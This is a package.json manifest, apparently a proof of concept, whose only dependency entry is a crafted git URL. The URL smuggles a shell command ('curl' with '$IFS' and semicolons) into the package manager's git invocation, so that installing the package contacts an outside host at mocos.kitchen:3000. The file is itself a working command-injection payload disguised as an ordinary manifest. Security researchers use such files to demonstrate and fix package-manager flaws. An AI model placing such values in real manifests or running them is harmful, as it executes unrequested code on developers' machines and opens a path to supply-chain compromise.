{
  "name": "javascript",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "private": true,
  "dependencies": {
    "package1": "git+https://github.com/#;curl$IFS@mocos.kitchen:3000;github.com/tyage/sample-package"
  }
}
